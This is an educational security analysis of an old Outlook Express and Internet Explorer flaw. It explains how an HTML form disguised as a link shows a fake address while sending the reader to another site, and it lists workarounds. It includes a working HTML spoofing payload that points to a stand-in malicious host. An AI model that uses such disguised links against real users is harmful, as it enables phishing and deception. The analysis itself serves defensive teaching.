Information Assurance

Information Assurance

Bugtraq Analysis

Malicious Form exploit in Outlook Express/Internet Explorer

back to bugtraq analyses page

Microsoft's Outlook Express is a popular free e-mail client used to download and view POP3 and IMAP e-mail messages. Outlook Express, and it's more feature-rich cousin Microsoft Outlook, allow e-mail messages to be written in plaintext as well as HTML format.

In this attack, a malicious user could send an HTML formatted e-mail message in which a form post command is embedded in an HTML link. By doing so, Internet Explorer, the program Outlook and Outlook Express typically use to translate HTML documents, will execute the form's action, while the user thinks he is merely clicking on a link. Normally, words or graphics are the primary things that would be anchored as links. However, if an entire form is presented as a link, then IE deignates the form as a link, and the fake address appears in Internet Explorer's status bar; however, instead of going to the address referenced in the link, Internet Explorer executes the code in the form.

Code:

<A
href="http://www.microsoft.com">
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com>
</A>

Here's what it looks like:

What Could Have Prevented It?

The problem arises in how Internet Explorer interprets the HTML code. Since the form is embedded into a link reference, IE should have ignored any executable code inside the link.

Workarounds:

Don't click on links in HTML e-mails when viewing them through Microsoft Outlook.

Type addresses into Internet Explorer instead of clicking on links. (yeah right)

What Can Be Done to Prevent This in the Future?

Alter Internet Explorer so that form data is not be executed when it is embedded inside a link reference.